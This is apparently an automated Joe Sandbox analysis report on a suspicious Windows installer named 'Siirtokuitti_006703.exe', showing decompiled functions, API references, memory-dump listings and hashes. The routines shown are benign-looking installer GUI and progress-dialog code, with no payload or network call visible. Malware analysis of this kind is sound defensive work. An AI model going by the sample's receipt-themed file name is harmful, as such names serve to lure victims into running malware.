                                                                                                                      0x0040664f
                                                                                                                      0x00406666
                                                                                                                      0x00406666
                                                                                                                      0x0040666d
                                                                                                                      0x00406679
                                                                                                                      0x00406679
                                                                                                                      0x0040667c
                                                                                                                      0x0040667f
                                                                                                                      0x00406684
                                                                                                                      0x00406686
                                                                                                                      0x0040668f
                                                                                                                      0x00406693
                                                                                                                      0x004066b0
                                                                                                                      0x004066b8
                                                                                                                      0x004066b8
                                                                                                                      0x004066bd
                                                                                                                      0x004066bf
                                                                                                                      0x004066c2
                                                                                                                      0x004066c7
                                                                                                                      0x004066c8
                                                                                                                      0x004066cc
                                                                                                                      0x004066cc
                                                                                                                      0x004066cd
                                                                                                                      0x004066d4
                                                                                                                      0x004066d6
                                                                                                                      0x004066dd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004066e5
                                                                                                                      0x004066eb
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004066eb
                                                                                                                      0x004066f0

                                                                                                                      APIs
                                                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Siirtokuitti_006703.exe",00403464,C:\Users\user\AppData\Local\Temp\,75833420,004036D5,?,00000006,00000008,0000000A), ref: 004066A7
                                                                                                                      • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066B6
                                                                                                                      • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Siirtokuitti_006703.exe",00403464,C:\Users\user\AppData\Local\Temp\,75833420,004036D5,?,00000006,00000008,0000000A), ref: 004066BB
                                                                                                                      • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Siirtokuitti_006703.exe",00403464,C:\Users\user\AppData\Local\Temp\,75833420,004036D5,?,00000006,00000008,0000000A), ref: 004066CE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Char$Next$Prev
                                                                                                                      • String ID: "C:\Users\user\Desktop\Siirtokuitti_006703.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                      • API String ID: 589700163-3856312973
                                                                                                                      • Opcode ID: 77b224228f8c57f44dbd024cb25da7c2d773c522f2af8fdd1da9e6af7933f215
                                                                                                                      • Instruction ID: 91382b34e261ab6a6b837a41ec70345278d3faa82d58aea2d88f3062b19e38b1
                                                                                                                      • Opcode Fuzzy Hash: 77b224228f8c57f44dbd024cb25da7c2d773c522f2af8fdd1da9e6af7933f215
                                                                                                                      • Instruction Fuzzy Hash: 8C11E61580070295DB302B149C40E7766B8EF587A4F12483FED86B32C0E77E4CD286AD
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E004043AC(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                                                      				struct tagLOGBRUSH _v16;
                                                                                                                      				long _t35;
                                                                                                                      				long _t37;
                                                                                                                      				void* _t40;
                                                                                                                      				long* _t49;
                                                                                                                      
                                                                                                                      				if(_a4 + 0xfffffecd > 5) {
                                                                                                                      					L15:
                                                                                                                      					return 0;
                                                                                                                      				}
                                                                                                                      				_t49 = GetWindowLongW(_a12, 0xffffffeb);
                                                                                                                      				if(_t49 == 0) {
                                                                                                                      					goto L15;
                                                                                                                      				}
                                                                                                                      				_t35 =  *_t49;
                                                                                                                      				if((_t49[5] & 0x00000002) != 0) {
                                                                                                                      					_t35 = GetSysColor(_t35);
                                                                                                                      				}
                                                                                                                      				if((_t49[5] & 0x00000001) != 0) {
                                                                                                                      					SetTextColor(_a8, _t35);
                                                                                                                      				}
                                                                                                                      				SetBkMode(_a8, _t49[4]);
                                                                                                                      				_t37 = _t49[1];
                                                                                                                      				_v16.lbColor = _t37;
                                                                                                                      				if((_t49[5] & 0x00000008) != 0) {
                                                                                                                      					_t37 = GetSysColor(_t37);
                                                                                                                      					_v16.lbColor = _t37;
                                                                                                                      				}
                                                                                                                      				if((_t49[5] & 0x00000004) != 0) {
                                                                                                                      					SetBkColor(_a8, _t37);
                                                                                                                      				}
                                                                                                                      				if((_t49[5] & 0x00000010) != 0) {
                                                                                                                      					_v16.lbStyle = _t49[2];
                                                                                                                      					_t40 = _t49[3];
                                                                                                                      					if(_t40 != 0) {
                                                                                                                      						DeleteObject(_t40);
                                                                                                                      					}
                                                                                                                      					_t49[3] = CreateBrushIndirect( &_v16);
                                                                                                                      				}
                                                                                                                      				return _t49[3];
                                                                                                                      			}








                                                                                                                      0x004043be
                                                                                                                      0x00404452
                                                                                                                      0x00000000
                                                                                                                      0x00404452
                                                                                                                      0x004043cf
                                                                                                                      0x004043d3
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004043d9
                                                                                                                      0x004043e2
                                                                                                                      0x004043e5
                                                                                                                      0x004043e5
                                                                                                                      0x004043eb
                                                                                                                      0x004043f1
                                                                                                                      0x004043f1
                                                                                                                      0x004043fd
                                                                                                                      0x00404403
                                                                                                                      0x0040440a
                                                                                                                      0x0040440d
                                                                                                                      0x00404410
                                                                                                                      0x00404412
                                                                                                                      0x00404412
                                                                                                                      0x0040441a
                                                                                                                      0x00404420
                                                                                                                      0x00404420
                                                                                                                      0x0040442a
                                                                                                                      0x0040442f
                                                                                                                      0x00404432
                                                                                                                      0x00404437
                                                                                                                      0x0040443a
                                                                                                                      0x0040443a
                                                                                                                      0x0040444a
                                                                                                                      0x0040444a
                                                                                                                      0x00000000

                                                                                                                      APIs
                                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 004043C9
                                                                                                                      • GetSysColor.USER32(00000000), ref: 004043E5
                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 004043F1
                                                                                                                      • SetBkMode.GDI32(?,?), ref: 004043FD
                                                                                                                      • GetSysColor.USER32(?), ref: 00404410
                                                                                                                      • SetBkColor.GDI32(?,?), ref: 00404420
                                                                                                                      • DeleteObject.GDI32(?), ref: 0040443A
                                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404444
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2320649405-0
                                                                                                                      • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                                                                      • Instruction ID: 701ae6dfa2b2a9365c03cf2c9b1b76f0db24f0feb35c46e7544c905291b2d973
                                                                                                                      • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                                                                      • Instruction Fuzzy Hash: 4B216671500704AFCB219F68DE48B5BBBF8AF81714F04893EED95E22A1D774E944CB54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00405414(signed int _a4, WCHAR* _a8) {
                                                                                                                      				struct HWND__* _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				WCHAR* _v32;
                                                                                                                      				long _v44;
                                                                                                                      				int _v48;
                                                                                                                      				void* _v52;
                                                                                                                      				void* __ebx;
                                                                                                                      				void* __edi;
                                                                                                                      				void* __esi;
                                                                                                                      				WCHAR* _t27;
                                                                                                                      				signed int _t28;
                                                                                                                      				long _t29;
                                                                                                                      				signed int _t37;
                                                                                                                      				signed int _t38;
                                                                                                                      
                                                                                                                      				_t27 =  *0x429224;
                                                                                                                      				_v8 = _t27;
                                                                                                                      				if(_t27 != 0) {
                                                                                                                      					_t37 =  *0x42a314;
                                                                                                                      					_v12 = _t37;
                                                                                                                      					_t38 = _t37 & 0x00000001;
                                                                                                                      					if(_t38 == 0) {
                                                                                                                      						E004063D2(_t38, 0, 0x422708, 0x422708, _a4);
                                                                                                                      					}
                                                                                                                      					_t27 = lstrlenW(0x422708);
                                                                                                                      					_a4 = _t27;
                                                                                                                      					if(_a8 == 0) {
                                                                                                                      						L6:
                                                                                                                      						if((_v12 & 0x00000004) == 0) {
                                                                                                                      							_t27 = SetWindowTextW( *0x429208, 0x422708);
                                                                                                                      						}
                                                                                                                      						if((_v12 & 0x00000002) == 0) {
                                                                                                                      							_v32 = 0x422708;
                                                                                                                      							_v52 = 1;
                                                                                                                      							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
                                                                                                                      							_v44 = 0;
                                                                                                                      							_v48 = _t29 - _t38;
                                                                                                                      							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
                                                                                                                      							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
                                                                                                                      						}
                                                                                                                      						if(_t38 != 0) {
                                                                                                                      							_t28 = _a4;
                                                                                                                      							0x422708[_t28] = 0;
                                                                                                                      							return _t28;
                                                                                                                      						}
                                                                                                                      					} else {
                                                                                                                      						_t27 = lstrlenW(_a8) + _a4;
                                                                                                                      						if(_t27 < 0x1000) {
                                                                                                                      							_t27 = lstrcatW(0x422708, _a8);
                                                                                                                      							goto L6;
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      				return _t27;
                                                                                                                      			}

















                                                                                                                      0x0040541a
                                                                                                                      0x00405424
                                                                                                                      0x00405429
                                                                                                                      0x0040542f
                                                                                                                      0x0040543a
                                                                                                                      0x0040543d
                                                                                                                      0x00405440
                                                                                                                      0x00405446
                                                                                                                      0x00405446
                                                                                                                      0x0040544c
                                                                                                                      0x00405454
                                                                                                                      0x00405457
                                                                                                                      0x00405474
                                                                                                                      0x00405478
                                                                                                                      0x00405481
                                                                                                                      0x00405481
                                                                                                                      0x0040548b
                                                                                                                      0x00405494
                                                                                                                      0x004054a0
                                                                                                                      0x004054a7
                                                                                                                      0x004054ab
                                                                                                                      0x004054ae
                                                                                                                      0x004054c1
                                                                                                                      0x004054cf
                                                                                                                      0x004054cf
                                                                                                                      0x004054d3
                                                                                                                      0x004054d5
                                                                                                                      0x004054d8
                                                                                                                      0x00000000
                                                                                                                      0x004054d8
                                                                                                                      0x00405459
                                                                                                                      0x00405461
                                                                                                                      0x00405469
                                                                                                                      0x0040546f
                                                                                                                      0x00000000
                                                                                                                      0x0040546f
                                                                                                                      0x00405469
                                                                                                                      0x00405457
                                                                                                                      0x004054e4

                                                                                                                      APIs
                                                                                                                      • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                                                                      • lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                                                                      • lstrcatW.KERNEL32(00422708,00402EEC), ref: 0040546F
                                                                                                                      • SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2531174081-0
                                                                                                                      • Opcode ID: ae6ed24060c0e1e5203a454600f337dd8354be9e28b06d37a059070ec5477373
                                                                                                                      • Instruction ID: b4c9d1203d7b93b364d12d55a96473d81469f1a16e33619bfa53f57c996d0385
                                                                                                                      • Opcode Fuzzy Hash: ae6ed24060c0e1e5203a454600f337dd8354be9e28b06d37a059070ec5477373
                                                                                                                      • Instruction Fuzzy Hash: 0E219071900518BACF119FA5DD85ADFBFB4EF45364F10803AF904B62A0C3794A90CFA8
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00402E72(intOrPtr _a4) {
                                                                                                                      				short _v132;
                                                                                                                      				long _t6;
                                                                                                                      				struct HWND__* _t7;
                                                                                                                      				struct HWND__* _t15;
                                                                                                                      
                                                                                                                      				if(_a4 != 0) {
                                                                                                                      					_t15 =  *0x418edc; // 0x0
                                                                                                                      					if(_t15 != 0) {
                                                                                                                      						_t15 = DestroyWindow(_t15);
                                                                                                                      					}
                                                                                                                      					 *0x418edc = 0;
                                                                                                                      					return _t15;
                                                                                                                      				}
                                                                                                                      				__eflags =  *0x418edc; // 0x0
                                                                                                                      				if(__eflags != 0) {
                                                                                                                      					return E004067C6(0);
                                                                                                                      				}
                                                                                                                      				_t6 = GetTickCount();
                                                                                                                      				__eflags = _t6 -  *0x42a250;
                                                                                                                      				if(_t6 >  *0x42a250) {
                                                                                                                      					__eflags =  *0x42a248;
                                                                                                                      					if( *0x42a248 == 0) {
                                                                                                                      						_t7 = CreateDialogParamW( *0x42a240, 0x6f, 0, E00402DD7, 0);
                                                                                                                      						 *0x418edc = _t7;
                                                                                                                      						return ShowWindow(_t7, 5);
                                                                                                                      					}
                                                                                                                      					__eflags =  *0x42a314 & 0x00000001;
                                                                                                                      					if(( *0x42a314 & 0x00000001) != 0) {
                                                                                                                      						wsprintfW( &_v132, L"... %d%%", E00402E56());
                                                                                                                      						return E00405414(0,  &_v132);
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      				return _t6;
                                                                                                                      			}







                                                                                                                      0x00402e81
                                                                                                                      0x00402e83
                                                                                                                      0x00402e8a
                                                                                                                      0x00402e8d
                                                                                                                      0x00402e8d
                                                                                                                      0x00402e93
                                                                                                                      0x00000000
                                                                                                                      0x00402e93
                                                                                                                      0x00402e9b
                                                                                                                      0x00402ea1
                                                                                                                      0x00000000
                                                                                                                      0x00402ea4
                                                                                                                      0x00402eab
                                                                                                                      0x00402eb1
                                                                                                                      0x00402eb7
                                                                                                                      0x00402eb9
                                                                                                                      0x00402ebf
                                                                                                                      0x00402efd
                                                                                                                      0x00402f06
                                                                                                                      0x00000000
                                                                                                                      0x00402f0b
                                                                                                                      0x00402ec1
                                                                                                                      0x00402ec8
                                                                                                                      0x00402ed9
                                                                                                                      0x00000000
                                                                                                                      0x00402ee7
                                                                                                                      0x00402ec8
                                                                                                                      0x00402f13

                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(00000000,00000000), ref: 00402E8D
                                                                                                                      • GetTickCount.KERNEL32 ref: 00402EAB
                                                                                                                      • wsprintfW.USER32 ref: 00402ED9
                                                                                                                        • Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                                                                        • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                                                                        • Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC), ref: 0040546F
                                                                                                                        • Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EFD
                                                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402F0B
                                                                                                                        • Part of subcall function 00402E56: MulDiv.KERNEL32(00000000,00000064,0000325F), ref: 00402E6B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                      • String ID: ... %d%%
                                                                                                                      • API String ID: 722711167-2449383134
                                                                                                                      • Opcode ID: 9d96e1b775b00f8f1aa504ccf668d13eff31e418fbd4a6343fc61565dbea9545
                                                                                                                      • Instruction ID: c2ec4548d439a14d597b05689786213ff5532ac021c242b5895b0761ec4a5705
                                                                                                                      • Opcode Fuzzy Hash: 9d96e1b775b00f8f1aa504ccf668d13eff31e418fbd4a6343fc61565dbea9545
                                                                                                                      • Instruction Fuzzy Hash: 0501C430440724EBCB31AB60EF4CB9B7B68AB00B44B50417FF945F12E0CAB844558BEE
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00404CDE(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                      				long _v8;
                                                                                                                      				signed char _v12;
                                                                                                                      				unsigned int _v16;
                                                                                                                      				void* _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				long _v56;
                                                                                                                      				void* _v60;
                                                                                                                      				long _t15;
                                                                                                                      				unsigned int _t19;
                                                                                                                      				signed int _t25;
                                                                                                                      				struct HWND__* _t28;
                                                                                                                      
                                                                                                                      				_t28 = _a4;
                                                                                                                      				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                                                                                      				if(_a8 == 0) {
                                                                                                                      					L4:
                                                                                                                      					_v56 = _t15;
                                                                                                                      					_v60 = 4;
                                                                                                                      					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                                                                                      					return _v24;
                                                                                                                      				}
                                                                                                                      				_t19 = GetMessagePos();
                                                                                                                      				_v16 = _t19 >> 0x10;
                                                                                                                      				_v20 = _t19;
                                                                                                                      				ScreenToClient(_t28,  &_v20);
                                                                                                                      				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                                                                                      				if((_v12 & 0x00000066) != 0) {
                                                                                                                      					_t15 = _v8;
                                                                                                                      					goto L4;
                                                                                                                      				}
                                                                                                                      				return _t25 | 0xffffffff;
                                                                                                                      			}














                                                                                                                      0x00404cec
                                                                                                                      0x00404cf9
                                                                                                                      0x00404cff
                                                                                                                      0x00404d3d
                                                                                                                      0x00404d3d
                                                                                                                      0x00404d4c
                                                                                                                      0x00404d53
                                                                                                                      0x00000000
                                                                                                                      0x00404d55
                                                                                                                      0x00404d01
                                                                                                                      0x00404d10
                                                                                                                      0x00404d18
                                                                                                                      0x00404d1b
                                                                                                                      0x00404d2d
                                                                                                                      0x00404d33
                                                                                                                      0x00404d3a
                                                                                                                      0x00000000
                                                                                                                      0x00404d3a
                                                                                                                      0x00000000

                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404CF9
                                                                                                                      • GetMessagePos.USER32 ref: 00404D01
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00404D1B
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D2D
                                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D53
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                                      • String ID: f
                                                                                                                      • API String ID: 41195575-1993550816
                                                                                                                      • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                      • Instruction ID: b067d4b0ecc7c77c1c3f0caef97ada8ed48413e9bef28a1d47140c0a876cf8aa
                                                                                                                      • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                      • Instruction Fuzzy Hash: AD015E71A0021DBADB00DB94DD85BFEBBBCAF95715F10412BBA50B62D0C7B899018BA4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00402DD7(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                      				short _v132;
                                                                                                                      				void* _t11;
                                                                                                                      				WCHAR* _t19;
                                                                                                                      
                                                                                                                      				if(_a8 == 0x110) {
                                                                                                                      					SetTimer(_a4, "true", 0xfa, 0);
                                                                                                                      					_a8 = 0x113;
                                                                                                                      				}
                                                                                                                      				if(_a8 == 0x113) {
                                                                                                                      					_t11 = E00402E56();
                                                                                                                      					_t19 = L"unpacking data: %d%%";
                                                                                                                      					if( *0x42a254 == 0) {
                                                                                                                      						_t19 = L"verifying installer: %d%%";
                                                                                                                      					}
                                                                                                                      					wsprintfW( &_v132, _t19, _t11);
                                                                                                                      					SetWindowTextW(_a4,  &_v132);
                                                                                                                      					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                                                                                      				}
                                                                                                                      				return 0;
                                                                                                                      			}






                                                                                                                      0x00402de7
                                                                                                                      0x00402df5
                                                                                                                      0x00402dfb
                                                                                                                      0x00402dfb
                                                                                                                      0x00402e09
                                                                                                                      0x00402e0b
                                                                                                                      0x00402e17
                                                                                                                      0x00402e1c
                                                                                                                      0x00402e1e
                                                                                                                      0x00402e1e
                                                                                                                      0x00402e29
                                                                                                                      0x00402e39
                                                                                                                      0x00402e4b
                                                                                                                      0x00402e4b
